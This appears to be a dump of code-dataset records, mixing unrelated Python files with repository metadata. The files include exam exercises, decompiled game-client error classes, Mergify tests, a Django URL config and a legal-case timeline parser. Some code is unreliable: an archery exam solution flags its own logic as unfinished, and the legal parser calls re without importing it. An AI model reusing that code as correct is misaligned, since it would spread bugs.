.. moduleauthor:: Jesse Andrews <jesse@ansolabs.com>
.. moduleauthor:: Devin Carlen <devin.carlen@gmail.com>
.. moduleauthor:: Vishvananda Ishaya <vishvananda@yahoo.com>
.. moduleauthor:: Joshua McKenty <joshua@cognition.ca>
.. moduleauthor:: Manish Singh <yosh@gimp.org>
.. moduleauthor:: Andy Smith <andy@anarkystic.com>
"""
| [
"dkang@isi.edu"
] | dkang@isi.edu |
53a41e841c6260418bd1e7ae9a20c99f0b338dbc | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/578164_Find_line_text_another/recipe-578164.py | fb286a488650b18fb2f8b998295941577af9201d | [
"MIT"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 975 | py | import sys
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("file1", help="First file whose lines you want to check")
parser.add_argument("file2", help="Second file, in which you want to search for lines from first file")
args = parser.parse_args()
file1 = open(args.file1)
file2 = open(args.file2)
print "Comparing:"
print args.file1
print "and"
print args.file2
print ""
print "Attempting to find lines in *file1* that are missing in *file2*"
print ""
file1array = file1.readlines()
file2a = file2.readlines()
lengthfile1array = len(file1array)
j=0;
for file1item in file1array:
j += 1
sys.stdout.write("Checking line#: %d/" %(j))
sys.stdout.write("%d \r" %(lengthfile1array))
i=0;
for file2item in file2a:
if file1item.rstrip() == file2item.rstrip():
i += 1
break
else:
i += 1
if i == len(file2a):
print "MISSING LINE FOUND at Line# " + str(j)
| [
"betty@qburst.com"
] | betty@qburst.com |
23dedd75381b9f1fe064efe634f7f8771b9ed2c0 | 565ae8473c545c43341f5511b9633e97f0e4da8b | /course2_python_fundamentals/10-Exams/1-MID-EXAM/PREPARATION/other-exams-for-exam-preparation/Mid_Exam_10_dec_2019/_2_Archery_Tournament.py | c801675c69580bc08321f897a5c16914079ec32a | [] | no_license | andriiburka/Web-Development-with-Python | 3934c1a3945bd983ab39d38b97f1af16fe784207 | b6927653a2c6a9cc10a8768395233e347624c49a | refs/heads/master | 2022-11-21T21:42:04.898254 | 2020-07-29T22:59:56 | 2020-07-29T22:59:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 811 | py | integers = list(map(int, input().split('|')))
# NOTE(review): exam scratch solution.  The shooting logic below looks
# unfinished/garbled (e.g. the 'Shoot Right' branch computes `action` but
# never uses it, and mutates `index` instead); it is kept as written apart
# from the fixes flagged inline -- verify against the original task
# statement before relying on the results.
while True:
    judge_command = input().split('@')  # split() already yields strings; map(str, ...) was redundant
    if judge_command[0] == 'Game over':
        break
    index = int(judge_command[1])
    length = int(judge_command[2])
    if judge_command[0] == 'Shoot Left':
        action = index - length
        a = integers.pop(action)
        integers.insert(action + 1, abs(a - 5))
    elif judge_command[0] == 'Shoot Right':  # fixed: the missing ':' was a SyntaxError
        if index + 1 == length:
            action = index + length
        for i in range(index + 1):
            if integers[i] == length:
                index = 0 + length
        integers.pop(index - 1)  # popped value was bound to an unused name before
        integers.insert(index, index - 5)
print(integers)
| [
"andriiburka@gmail.com"
] | andriiburka@gmail.com |
7c5d43f43b42b60f2b4114b30bbe086c274ce47d | 2af6a5c2d33e2046a1d25ae9dd66d349d3833940 | /res/scripts/client/messenger/proto/shared_errors.py | 967a966ccf6f0da8b65759b6db45d2cedde60407 | [] | no_license | webiumsk/WOT-0.9.12-CT | e6c8b5bb106fad71b5c3056ada59fb1aebc5f2b2 | 2506e34bd6634ad500b6501f4ed4f04af3f43fa0 | refs/heads/master | 2021-01-10T01:38:38.080814 | 2015-11-11T00:08:04 | 2015-11-11T00:08:04 | 45,803,240 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 4,826 | py | # 2015.11.10 21:30:27 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/messenger/proto/shared_errors.py
import BigWorld
from gui.Scaleform.locale.MESSENGER import MESSENGER as I18N_MESSENGER
from helpers import i18n
from messenger.m_constants import CLIENT_ERROR_NAMES, CLIENT_ACTION_NAMES, CLIENT_ERROR_ID
from messenger.proto.interfaces import IChatError
class I18nErrorID(object):
    """Wraps a numeric client error ID and resolves its symbolic name and
    i18n lookup key."""
    __slots__ = ('errorID',)
    def __init__(self, errorID):
        super(I18nErrorID, self).__init__()
        self.errorID = errorID
    def __repr__(self):
        return '{0}'.format(self.getName())
    def getName(self):
        """Return the symbolic name, or a generic CLIENT_ERROR_<id> fallback."""
        if self.errorID in CLIENT_ERROR_NAMES:
            return CLIENT_ERROR_NAMES[self.errorID]
        return 'CLIENT_ERROR_{0}'.format(self.errorID)
    def getI18nKey(self):
        """Return the i18n key under which this error's message is stored."""
        return I18N_MESSENGER.client_error_shared(self.getName())
class I18nActionID(object):
    """Wraps a numeric client action ID and resolves its (localized) name."""
    __slots__ = ('actionID',)
    def __init__(self, actionID):
        super(I18nActionID, self).__init__()
        self.actionID = actionID
    def __repr__(self):
        return '{0}'.format(self.getName())
    def getName(self):
        """Return the symbolic name, or a generic CLIENT_ACTION_<id> fallback."""
        if self.actionID in CLIENT_ACTION_NAMES:
            return CLIENT_ACTION_NAMES[self.actionID]
        return 'CLIENT_ACTION_{0}'.format(self.actionID)
    def getI18nName(self):
        """Return the localized action name when a translation exists,
        otherwise the raw symbolic name."""
        name = self.getName()
        key = I18N_MESSENGER.client_action(name)
        if key:
            return i18n.makeString(key)
        return name
class ClientError(IChatError):
    """A chat error raised on the client side, rendered via the i18n tables."""
    __slots__ = ('_error', '_kwargs')
    def __init__(self, errorID, **kwargs):
        self._error = self.createError(errorID)
        self._kwargs = kwargs
    def __repr__(self):
        return '{0}(error={1})'.format(self.__class__.__name__, self._error)
    def createError(self, errorID):
        """Factory hook; subclasses may return a different error wrapper."""
        return I18nErrorID(errorID)
    def getErrorID(self):
        return self._error.errorID
    def getErrorName(self):
        return self._error.getName()
    def getMessage(self):
        """Return the localized message; without an i18n key, fall back to
        the raw error name (plus the kwargs, if any)."""
        key = self._error.getI18nKey()
        if key:
            return i18n.makeString(key, **self._kwargs)
        message = self._error.getName()
        if self._kwargs:
            message = '{0}/{1}'.format(message, self._kwargs)
        return message
class ClientActionError(ClientError):
    """Client error bound to a specific user action."""
    __slots__ = ('_action',)

    def __init__(self, actionID, errorID = None, **kwargs):
        # Without an explicit error the generic client error is reported.
        super(ClientActionError, self).__init__((errorID or CLIENT_ERROR_ID.GENERIC), **kwargs)
        self._action = self.createAction(actionID)

    def __repr__(self):
        return '{0}(action={1}, error={2})'.format(self.__class__.__name__, self._action, self._error)

    def createAction(self, actionID):
        # Factory hook mirroring ClientError.createError.
        return I18nActionID(actionID)

    def getActionID(self):
        return self._action.actionID

    def getMessage(self):
        # Inject the localized action name unless the caller supplied one.
        if 'actionName' not in self._kwargs:
            self._kwargs['actionName'] = self._action.getI18nName()
        return super(ClientActionError, self).getMessage()
class ChatCoolDownError(ClientActionError):
    """Error raised when an action is attempted while still on cooldown."""

    def __init__(self, actionID, coolDown = None):
        # floatArg1 carries the remaining cooldown period, when known.
        kwargs = {'floatArg1': coolDown} if coolDown else {}
        super(ChatCoolDownError, self).__init__(actionID, CLIENT_ERROR_ID.COOLDOWN, **kwargs)

    def getMessage(self):
        actionName = self._action.getI18nName()
        if not self._kwargs:
            # No cooldown period available: use the message without a period.
            return i18n.makeString(I18N_MESSENGER.CLIENT_ERROR_ACTION_IN_COOLDOWN_WO_PERIOD, actionName=actionName)
        return i18n.makeString(I18N_MESSENGER.CLIENT_ERROR_ACTION_IN_COOLDOWN, actionName=actionName, **self._kwargs)
class ChatBanError(IChatError):
    """Modal error shown when the player is banned from chat."""
    __slots__ = ('_endTime', '_reason')

    def __init__(self, endTime, reason):
        super(ChatBanError, self).__init__()
        self._endTime = endTime
        self._reason = reason

    def getTitle(self):
        return i18n.makeString(I18N_MESSENGER.SERVER_ERRORS_CHATBANNED_TITLE)

    def getMessage(self):
        if not self._endTime:
            # Permanent ban: there is no expiry timestamp to show.
            return i18n.makeString('#chat:errors/chatbannedpermanent', banReason=self._reason)
        banEndTime = BigWorld.wg_getLongDateFormat(self._endTime) + ' ' + BigWorld.wg_getShortTimeFormat(self._endTime)
        return i18n.makeString('#chat:errors/chatbanned', banEndTime=banEndTime, banReason=self._reason)

    def isModal(self):
        return True
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\messenger\proto\shared_errors.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.10 21:30:28 Střední Evropa (běžný čas)
| [
"info@webium.sk"
] | info@webium.sk |
b14a6a992a76e45e9bff3f37e5aee488de432395 | 66b504cac41d9e02ef605613ef86911e647b7584 | /mergify_engine/tests/functional/actions/test_request_reviews.py | 5aa49cf05b92501795632c8df178d32ab52849e3 | [
"Apache-2.0"
] | permissive | Nytelife26/mergify-engine | 894217f88b93ed48df6f8700cf955826dad3173a | 98c2119e26021a39c7985baccf4f3e35500e7ab2 | refs/heads/master | 2023-04-04T09:48:06.904066 | 2021-04-08T18:29:40 | 2021-04-09T16:21:04 | 356,945,975 | 0 | 0 | Apache-2.0 | 2021-04-11T18:21:27 | 2021-04-11T18:21:27 | null | UTF-8 | Python | false | false | 6,561 | py | # -*- encoding: utf-8 -*-
#
# Copyright © 2018–2020 Mergify SAS
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
import pytest
import yaml
from mergify_engine import context
from mergify_engine.actions import request_reviews
from mergify_engine.tests.functional import base
class TestRequestReviewsAction(base.FunctionalTestBase):
    """Functional tests for the `request_reviews` pull-request action."""

    async def test_request_reviews_users(self):
        """A rule listing `users` requests a review from each listed user."""
        rules = {
            "pull_request_rules": [
                {
                    "name": "request_reviews",
                    "conditions": [f"base={self.master_branch_name}"],
                    "actions": {"request_reviews": {"users": ["mergify-test1"]}},
                }
            ]
        }
        await self.setup_repo(yaml.dump(rules))
        p, _ = await self.create_pr()
        await self.run_engine()
        pulls = await self.get_pulls(base=self.master_branch_name)
        assert 1 == len(pulls)
        requests = await self.get_review_requests(pulls[0]["number"])
        assert sorted(["mergify-test1"]) == sorted(
            user["login"] for user in requests["users"]
        )

    async def test_request_reviews_teams(self):
        """A rule listing `teams` requests a team review (the team is first
        granted push permission on the repo)."""
        team = (await self.get_teams())[0]
        await self.add_team_permission(team["slug"], "push")
        rules = {
            "pull_request_rules": [
                {
                    "name": "request_reviews",
                    "conditions": [f"base={self.master_branch_name}"],
                    "actions": {"request_reviews": {"teams": [team["slug"]]}},
                }
            ]
        }
        await self.setup_repo(yaml.dump(rules))
        p, _ = await self.create_pr()
        await self.run_engine()
        pulls = await self.get_pulls(base=self.master_branch_name)
        assert 1 == len(pulls)
        requests = await self.get_review_requests(pulls[0]["number"])
        assert sorted([team["slug"]]) == sorted(
            team["slug"] for team in requests["teams"]
        )

    @mock.patch.object(
        request_reviews.RequestReviewsAction, "GITHUB_MAXIMUM_REVIEW_REQUEST", new=1
    )
    async def test_request_reviews_already_max(self):
        """With the request cap patched to 1, only the first user gets a
        review request and the action reports a neutral check run."""
        rules = {
            "pull_request_rules": [
                {
                    "name": "approve",
                    "conditions": [f"base={self.master_branch_name}"],
                    "actions": {"review": {"type": "APPROVE"}},
                },
                {
                    "name": "request_reviews",
                    "conditions": [f"base={self.master_branch_name}"],
                    "actions": {
                        "request_reviews": {"users": ["mergify-test1", "mergify-test"]}
                    },
                },
            ]
        }
        await self.setup_repo(yaml.dump(rules))
        p, _ = await self.create_pr()
        await self.run_engine()
        pulls = await self.get_pulls(base=self.master_branch_name)
        assert 1 == len(pulls)
        requests = await self.get_review_requests(pulls[0]["number"])
        # Only the first listed user fits under the (patched) cap of 1.
        assert ["mergify-test1"] == [user["login"] for user in requests["users"]]
        ctxt = await context.Context.create(self.repository_ctxt, p, [])
        checks = await ctxt.pull_engine_check_runs
        assert len(checks) == 2
        for check in checks:
            if check["name"] == "Rule: request_reviews (request_reviews)":
                assert "neutral" == check["conclusion"]
                assert (
                    "Maximum number of reviews already requested"
                    == check["output"]["title"]
                )
                assert (
                    "The maximum number of 1 reviews has been reached.\n"
                    "Unable to request reviews for additional users."
                    == check["output"]["summary"]
                )
                break
        else:
            pytest.fail("Unable to find request review check run")

    @mock.patch.object(
        request_reviews.RequestReviewsAction, "GITHUB_MAXIMUM_REVIEW_REQUEST", new=2
    )
    async def test_request_reviews_going_above_max(self):
        """With a cap of 2 and one review already requested, topping up stops
        at the cap and the overflow is reported via a neutral check run."""
        rules = {
            "pull_request_rules": [
                {
                    "name": "request_reviews",
                    "conditions": [
                        f"base={self.master_branch_name}",
                        "#review-requested>0",
                    ],
                    "actions": {
                        "request_reviews": {
                            "users": ["mergify-test1", "mergify-test3"],
                            "teams": ["mergifyio-testing/testing"],
                        }
                    },
                },
            ]
        }
        await self.setup_repo(yaml.dump(rules))
        p, _ = await self.create_pr()
        await self.run_engine()
        pulls = await self.get_pulls(base=self.master_branch_name)
        assert 1 == len(pulls)
        await self.create_review_request(pulls[0]["number"], ["mergify-test1"])
        await self.run_engine()
        requests = await self.get_review_requests(pulls[0]["number"])
        assert sorted(["mergify-test1", "mergify-test3"]) == sorted(
            user["login"] for user in requests["users"]
        )
        ctxt = await context.Context.create(self.repository_ctxt, p, [])
        checks = await ctxt.pull_engine_check_runs
        assert len(checks) == 2
        for check in checks:
            if check["name"] == "Rule: request_reviews (request_reviews)":
                assert "neutral" == check["conclusion"]
                assert (
                    "Maximum number of reviews already requested"
                    == check["output"]["title"]
                )
                assert (
                    "The maximum number of 2 reviews has been reached.\n"
                    "Unable to request reviews for additional users."
                    == check["output"]["summary"]
                )
                break
        else:
            pytest.fail("Unable to find request review check run")
| [
"37929162+mergify[bot]@users.noreply.github.com"
] | 37929162+mergify[bot]@users.noreply.github.com |
194e207bc958493908fac766954695e21e84316a | 7b65a38aca6fc4fb6f39bc5de1e0f352f3ab7e25 | /s9/9.1_espacios.py | b37d38a4121ed466d8d9f17a99e7eb815f8d0ca6 | [] | no_license | camohe90/-mision_tic_G1 | 96b10e4ae14278cf53f0a87638643112e2f81709 | f083c8a0a133b9be1a8d6e8f61cde46cd1aa75e5 | refs/heads/master | 2023-05-26T03:53:25.660868 | 2021-06-09T12:44:48 | 2021-06-09T12:44:48 | 371,374,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 141 | py | # Usando 4 espacios
def es_par(num):
    """Return True when *num* is even (printing "par"), else False."""
    if num % 2 != 0:
        return False
    print("par")
    return True
| [
"camohe90@gmail.com"
] | camohe90@gmail.com |
dc227e7b0d70151dd193d560dc8cd7da9835d83e | 41d9b92ef2a74a4ba05d27ffbe3beb87884c4ce7 | /math/0x03-probability/normal.py | 5db0c14284738923b0e7d0984afd2984ea74f577 | [] | no_license | JosephK89/holbertonschool-machine_learning | 3f96d886c61d8de99a23e4348fb045b9c930740e | aa5c500f7d8ebeec951f9ab5ec017cae64007c25 | refs/heads/main | 2023-08-14T18:42:53.481354 | 2021-10-10T19:53:40 | 2021-10-10T19:53:40 | 386,248,140 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,529 | py | #!/usr/bin/env python3
"""normal distribution module"""
class Normal:
    """Represents a normal (Gaussian) distribution."""

    def __init__(self, data=None, mean=0., stddev=1.):
        """Initialize the distribution.

        Args:
            data (list): optional samples; when given, mean and stddev are
                estimated from them (population standard deviation).
            mean (float): distribution mean, used when data is None.
            stddev (float): standard deviation, used when data is None.

        Raises:
            ValueError: if stddev <= 0 (without data), or data has fewer
                than two values.
            TypeError: if data is not a list.
        """
        if data is None:
            if stddev <= 0:
                raise ValueError("stddev must be a positive value")
            self.mean = float(mean)
            self.stddev = float(stddev)
        else:
            if type(data) != list:
                raise TypeError("data must be a list")
            if len(data) < 2:
                raise ValueError("data must contain multiple values")
            self.mean = (sum(data) / len(data))
            # Population variance via a generator expression instead of the
            # previous index-based accumulation loop.
            variance = sum((x - self.mean) ** 2 for x in data) / len(data)
            self.stddev = variance ** (1 / 2)

    def z_score(self, x):
        """Return the z-score of x under this distribution."""
        return (x - self.mean) / self.stddev

    def x_value(self, z):
        """Return the x-value corresponding to the z-score z."""
        return self.stddev * z + self.mean

    def pdf(self, x):
        """Return the probability density at x.

        Numeric constants are inlined (presumably to avoid importing math —
        keep them in sync with cdf); accurate to ~10 significant digits.
        """
        e = 2.7182818285
        pi = 3.1415926536
        z = (x - self.mean) / self.stddev
        return (e ** ((-1 / 2) * (z ** 2))) * (
            1 / (self.stddev * (2 * pi) ** (1 / 2)))

    def cdf(self, x):
        """Return the cumulative probability at x via a truncated erf series."""
        pi = 3.1415926536
        t = (x - self.mean) / (self.stddev * (2 ** (1 / 2)))
        erf = (2 / (pi ** (1 / 2))) * (t - (t ** 3) / 3 + (
            t ** 5) / 10 - (t ** 7) / 42 + (t ** 9) / 216)
        return (1 / 2) * (1 + erf)
| [
"josephkamel262@gmail.com"
] | josephkamel262@gmail.com |
a1f3baae2ae7d957d069289b1f36d2f680d3f886 | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-gsn-edf/gsn-edf_ut=2.5_rd=0.5_rw=0.06_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=12/params.py | 106ee852332fe69aea38aeb0a6597ada33dc539f | [] | no_license | ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | {'cpus': 4,
 # Remaining entries of the experiment-parameter dict (opened on the previous
 # line): a GSN-EDF schedulability trial on 4 CPUs. Several numeric values are
 # stored as strings — presumably the consumer parses them; confirm before
 # changing types.
 'duration': 30,
 'final_util': '2.525095',
 'max_util': '2.5',
 'periods': 'harmonic-2',
 'release_master': False,
 'res_distr': '0.5',
 'res_nmb': '4',
 'res_weight': '0.06',
 'scheduler': 'GSN-EDF',
 'trial': 12,
 'utils': 'uni-medium-3'}
| [
"ricardo.btxr@gmail.com"
] | ricardo.btxr@gmail.com |
8127981a06daf63dd10904afe21974e27bd20512 | 580905861e3bdd1990cde76ba2b057c898e6f088 | /Django_Stuff/class_based_views/basic_app/urls.py | 8096ed097b0ecd3ea89f8ca6fa5ecf60bc74a0e5 | [
"MIT"
] | permissive | muhammad-mamdouh/Django_Projects | 14eddfdc25aa4be43c5d35e30c5efb146e255101 | 1f31e12aefb36b33474256db40a2c551882f445e | refs/heads/master | 2022-12-10T20:02:38.918760 | 2019-12-14T21:24:08 | 2019-12-14T21:24:08 | 198,602,869 | 0 | 1 | null | 2022-11-22T04:13:34 | 2019-07-24T09:28:59 | Python | UTF-8 | Python | false | false | 487 | py | from django.urls import path
from . import views
app_name = 'basic_app'  # URL namespace: reverse as 'basic_app:<name>'

# CRUD routes for School objects, all served by class-based views.
urlpatterns = [
    path('', views.SchoolListView.as_view(), name='schools_list'),
    path('<int:pk>/', views.SchoolDetailView.as_view(), name='school_details'),
    path('create/', views.SchoolCreateView.as_view(), name='school_create'),
    path('update/<int:pk>/', views.SchoolUpdateView.as_view(), name='school_update'),
    path('delete/<int:pk>/', views.SchoolDeleteView.as_view(), name='school_delete'),
]
| [
"mahammad.mamdouh@gmail.com"
] | mahammad.mamdouh@gmail.com |
97539f5418cf3928aff3692de719426093e91949 | aa4901a8e75bb31e27a5088ec6e53494e19ea48e | /main/api/permissions.py | 594a2774c732f6e32c3c5f783d4ad4017cca2407 | [] | no_license | ByAvatarOff/SameTinder | e65cbbcc25a383e10c602de235e6f38bd5917f98 | 3e89c572c2edb78286f136f87cc3ff4846bd2059 | refs/heads/master | 2023-05-27T20:07:22.188835 | 2021-06-09T10:42:32 | 2021-06-09T10:42:32 | 335,273,909 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 288 | py | from rest_framework.permissions import BasePermission, SAFE_METHODS
class IsOwnerProfile(BasePermission):
    """Object-level permission granting access only when the requester is
    NOT the profile's owner.

    NOTE(review): despite the class name, the check is
    ``obj.user != request.user`` — users may act on every profile except
    their own (plausible for a matching/swiping flow). Confirm the
    inversion is intentional before renaming or flipping it.
    """

    def has_object_permission(self, request, view, obj):
        # Leftover debug print() calls removed; the decision is unchanged.
        return obj.user != request.user
"tsp7439@gmail.com"
] | tsp7439@gmail.com |
959059b948a2b693180c69490a916f6139a44483 | f95d2646f8428cceed98681f8ed2407d4f044941 | /day40/test_lock.py | daad077e967e8ed2e3bf02e29c495f046ca8dacf | [] | no_license | q2806060/python-note | 014e1458dcfa896f2749c7ebce68b2bbe31a3bf8 | fbe107d668b44b78ae0094dbcc7e8ff8a4f8c983 | refs/heads/master | 2020-08-18T01:12:31.227654 | 2019-10-17T07:40:40 | 2019-10-17T07:40:40 | 215,731,114 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | from threading import Lock, Thread
# Shared counters: read by the watcher thread (f1) and written by the main
# thread, always under the same lock.
m = 0
n = 0
def f1():
    """Watcher thread body: forever, under the shared lock, print the two
    global counters whenever they disagree (they never should, since the
    writer updates both while holding the same lock)."""
    while True:
        with lock:  # 'lock' is created in the __main__ block before the thread starts
            if m != n:
                print('m =', m, 'n =', n)
if __name__ == '__main__':
    lock = Lock()
    t = Thread(target=f1)
    t.start()
    while True:
        with lock:
            # Both increments happen inside the lock, so f1 can never
            # observe m != n.
            m += 1
            n += 1
    t.join()  # NOTE: unreachable — the loop above never exits
| [
"C8916BA958F57D5A740E38E94644A3F8@i-search.com.cn"
] | C8916BA958F57D5A740E38E94644A3F8@i-search.com.cn |
a28e70a40e954a2b65089db852c5a4ebf621fa2c | 0b932d446d88013fadb8c4e0dd3ca3cc4a1a5de3 | /localizacion/inte_nro_control_secuencial/__manifest__.py | 3fe660f1f411281f17218061b50905c915108f7f | [] | no_license | grudiver/biumak | cd8e7477bba3389b2144fa6d35cd89d2eaf0210f | 65705737f16da087b6cb01f725236e7bc9c59c86 | refs/heads/master | 2022-04-11T13:17:33.347975 | 2020-03-24T17:55:24 | 2020-03-24T17:55:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 638 | py | # coding: utf-8
###########################################################################
##############################################################################
# Odoo addon manifest: metadata, dependencies and data files for the
# Venezuelan SENIAT automatic control-number localization module.
{
    "name": "Números de control SENIAT automaticos TYSAMNCA",
    "version": "1.0",
    "author": "Tysamnca",
    "license": "AGPL-3",
    "category": "Sales",
    #"website": "http://www.tysamnca.com/",
    "colaborador": "Nathaly Partidas",
    # Modules that must be installed before this one.
    "depends": [
        "account",
        "l10n_ve_fiscal_requirements",
        "base"
    ],
    'demo': [
    ],
    # XML files loaded on install/update.
    "data": [
        'view/invoice_view.xml',
    ],
    'test': [
    ],
    "installable": True,
} | [
"soporte.innova2129@gmail.com"
] | soporte.innova2129@gmail.com |
07a6a238b645d7e22766752b4f28aa6af2f7adf2 | 52243c4a05a296e7c042663b5942faa47eb66aee | /common_nlp/historico_processo.py | 0ae114414b1095471ef1bb0480d7dbc6e4ac3f52 | [
"MIT"
] | permissive | joaoppadua/Pesquisas | fbe0311b59340c041732d6d1f7f4862fa6c53198 | 808d8b0ef9e432e05a4f284ce18778ed8b3acd96 | refs/heads/master | 2023-07-16T02:50:30.846205 | 2021-09-03T13:34:54 | 2021-09-03T13:34:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,954 | py | from parserTextoJuridico import parserTextoJuridico
import pandas as pd, json, arrow
class historico_processo(parserTextoJuridico):
    """Builds and maintains the procedural history (histórico) of a lawsuit
    from court publications stored in the ``diarios`` database."""

    def __init__(self):
        super().__init__()
        # Page size used when paging through diarios.publicacoes_diarias.
        self.batch_publicacoes = 1000
        # Timeline dict (see criar_historico) or None until created/loaded.
        self.historico = None
        self.id_processo = None
        # Case numbers whose publications already matched a regex search.
        self.processos_analisados = []
        self.numero_processo = None

    def andamentos_id_regex(self, cursor, regex, upper_bound, lower_bound=0):
        """Scan publication pages for texts matching *regex* and return the
        ids (diarios.numero_proc.id) of the matched case numbers.

        NOTE(review): *upper_bound* is accepted but unused, and pages are
        fetched with ``limit n, batch_publicacoes`` while n advances by 1,
        so consecutive pages overlap heavily — confirm the intended
        pagination before relying on this scan.
        """
        for n in range(lower_bound, self.batch_publicacoes):
            publicacoes = self.download_publicacoes(cursor, n)
            for numero, texto in publicacoes:
                if numero not in self.processos_analisados and re.search(regex, texto):
                    self.processos_analisados.append(numero)
        if not self.processos_analisados:
            return []
        # Parameterized IN (...) query. The previous version interpolated the
        # numbers directly into the SQL string, which was both injectable and
        # malformed (it emitted a dangling quote at the end of the list).
        placeholders = ", ".join(["%s"] * len(self.processos_analisados))
        cursor.execute(
            "SELECT id from diarios.numero_proc where numero in (%s);" % placeholders,
            list(self.processos_analisados),
        )
        lista_ids = [i[0] for i in cursor.fetchall()]
        return lista_ids

    def atualiza_historico(self, andamentos):
        """Classify each andamento (tribunal, data, texto, classe) and file it
        under the matching timeline bucket, then refresh the durations.

        Entries whose classe_publicacao is neither "NULL" nor "" are assumed
        to have been classified elsewhere and are skipped here.
        """
        for tribunal, data_pub, texto, classe_publicacao in andamentos:
            if classe_publicacao not in ("NULL", ""):
                continue
            classe = self.classifica_texto(texto)
            entrada = (data_pub, tribunal, texto)
            if classe == "Certidão":
                self.historico["certidões"].append(entrada)
            elif classe in ("Agravo", "Mandado de Segurança",
                            "Embargos declaratórios", "Recurso"):
                self.historico["recursos"].append(entrada)
            elif classe == "Movimento processual":
                self.historico["movimentações processuais"].append(entrada)
            elif classe in ("Sentença", "Homologação de acordo"):
                self.historico["sentença"].append(entrada)
            elif classe == "Liminar":
                self.historico["liminares"].append(entrada)
            else:
                self.historico["outras movimentações"].append(entrada)
        self.tempo_duracao()

    def atualiza_historico_existente(self, novos_andamentos, historico_p=None):
        """Update an existing timeline with *novos_andamentos*, optionally
        loading it first from the JSON string *historico_p*."""
        if historico_p:
            self.load_historico(historico_p)
        self.atualiza_historico(novos_andamentos)

    def criar_historico(self, andamentos):
        """Create a fresh, empty timeline structure and populate it."""
        # FALTA (still missing): perícia, execução
        self.historico = {
            # each bucket holds (data, tribunal, texto) tuples
            "audiencias": [],
            "certidões": [],
            # date string of the most recent distribution
            "distribuição": None,
            "liminares": [],
            "movimentações processuais": [],
            "outras movimentações": [],
            "recursos": [],
            "sentença": [],
            # durations (in days) between procedural milestones
            "tempo de duração": {
                "Audiência a sentença": None,
                "Citação a sentença": None,
                "Distribuição a audiência": None,
                "Distribuição a sentença": None,
            },
        }
        self.atualiza_historico(andamentos)

    def download_publicacoes(self, cursor, lower_bound):
        """Fetch one page of (numero, texto) publication rows.

        Both interpolated values are internally produced ints, so the %-format
        here is not user-controllable.
        """
        cursor.execute(
            "SELECT numero, texto from diarios.publicacoes_diarias limit %s, %s"
            % (lower_bound, self.batch_publicacoes)
        )
        return cursor.fetchall()

    def historico_as_string(self):
        """Serialize the timeline to a JSON string for storage."""
        return json.dumps(self.historico)

    def load_historico(self, historico):
        """Load a timeline previously produced by historico_as_string()."""
        self.historico = json.loads(historico)

    def tempo_duracao(self):
        """Recompute the milestone durations (in days) from the timeline.

        Dates are parsed with arrow using the DD/MM/YYYY format. Timeline
        entries are (data, tribunal, texto) tuples, so the date is element 0;
        the previous version read element 1 (the tribunal), which can never
        parse as a date.
        """
        if not self.historico:
            return None
        data_distribuicao = None
        data_audiencia = None
        data_sentenca = None
        if self.historico["distribuição"]:
            data_distribuicao = arrow.get(self.historico["distribuição"], "DD/MM/YYYY")
        if len(self.historico["audiencias"]):
            data_audiencia = arrow.get(
                self.historico["audiencias"][-1][0], "DD/MM/YYYY"
            )
        if len(self.historico["sentença"]):
            data_sentenca = arrow.get(self.historico["sentença"][-1][0], "DD/MM/YYYY")
        duracoes = self.historico["tempo de duração"]
        if data_sentenca:
            if data_audiencia:
                duracoes["Audiência a sentença"] = (
                    data_sentenca - data_audiencia
                ).days
            if data_distribuicao:
                duracoes["Distribuição a sentença"] = (
                    data_sentenca - data_distribuicao
                ).days
        if data_distribuicao and data_audiencia:
            duracoes["Distribuição a audiência"] = (
                data_audiencia - data_distribuicao
            ).days
def main():
    """Placeholder CLI entry point (not implemented yet)."""
    pass


if __name__ == "__main__":
    main()
| [
"danilopcarlotti@gmail.com"
] | danilopcarlotti@gmail.com |
d48c7d8e186158688fa8c2d9fb45afdee4e40eee | d28bd8a27dd33e8140f2dc48ae169b8c0fe46147 | /setup.py | 301b47df2fa164da557c51ec1ff11a2069a127f4 | [] | no_license | marians/agssearch | b622de07b154ffdc688d477eb8ada66b516f8a64 | 3cabcaffda87347860072397a8e21773f217fad5 | refs/heads/master | 2016-09-05T11:30:19.978140 | 2014-01-26T12:45:22 | 2014-01-26T12:45:22 | 9,577,467 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 637 | py | # encoding: utf-8
from setuptools import setup

# Convert the Markdown README to reStructuredText for PyPI; fall back to an
# empty long description when pypandoc (or the README) is unavailable.
try:
    import pypandoc
    description = pypandoc.convert('README.md', 'rst')
except (IOError, ImportError):
